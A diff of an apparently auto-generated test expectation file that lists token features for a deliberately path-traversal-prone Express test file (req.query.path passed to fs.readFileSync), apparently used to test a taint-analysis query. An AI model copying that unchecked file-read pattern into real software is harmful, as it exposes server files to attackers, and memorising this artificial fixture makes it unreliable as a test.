readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:243:8:243:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:243:8:243:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:243:8:243:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:243:8:243:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:243:8:243:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | calleeImports | fs | @@ -8879,6 +75900,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:243:21:243:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:245:5:245:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:245:8:245:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:245:8:245:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:245:8:245:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:245:8:245:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:245:8:245:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | calleeImports | fs | @@ -8888,6 +75934,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:245:21:245:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | exceptional return of path.sl ... length) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | exceptional return of path.sl ... length) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | exceptional return of path.sl ... length) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | exceptional return of path.sl ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | exceptional return of path.sl ... length) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:49 | path.sl ... elf.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:49 | path.sl ... elf.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:49 | path.sl ... elf.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:49 | path.sl ... elf.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:7:247:49 | path.sl ... elf.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:12:247:16 | slice | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:12:247:16 | slice | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:12:247:16 | slice | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:12:247:16 | slice | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:12:247:16 | slice | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | CalleeFlexibleAccessPath | path.slice | | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | calleeImports | path | @@ -8897,6 +75973,16 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:247:18:247:18 | 0 | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:24 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:24 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:24 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:24 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:24 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:28 | self.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:28 | self.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:28 | self.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:28 | self.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:21:247:28 | self.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | CalleeFlexibleAccessPath | path.slice | | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | calleeImports | path | @@ -8906,6 +75992,56 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:247:21:247:35 | self.dir.length | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:247:26:247:28 | dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:26:247:28 | dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:26:247:28 | dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:26:247:28 | dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:26:247:28 | dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:30:247:35 | length | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:30:247:35 | length | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:30:247:35 | length | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:30:247:35 | length | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:30:247:35 | length | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:45 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:45 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:45 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:45 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:45 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:49 | self.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:49 | self.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:49 | self.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:49 | self.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:42:247:49 | self.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:247:47:247:49 | dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:247:47:247:49 | dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:247:47:247:49 | dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:247:47:247:49 | dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:247:47:247:49 | dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:248:5:248:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:248:8:248:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:248:8:248:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:248:8:248:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:248:8:248:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:248:8:248:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | calleeImports | fs | @@ -8915,6 +76051,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:248:21:248:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:250:5:250:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:250:8:250:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:250:8:250:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:250:8:250:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:250:8:250:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:250:8:250:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | calleeImports | fs | @@ -8924,6 +76085,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:250:21:250:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:253:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:1:298:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:5:253:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:5:253:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:5:253:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | InputArgumentIndex | 0 | | 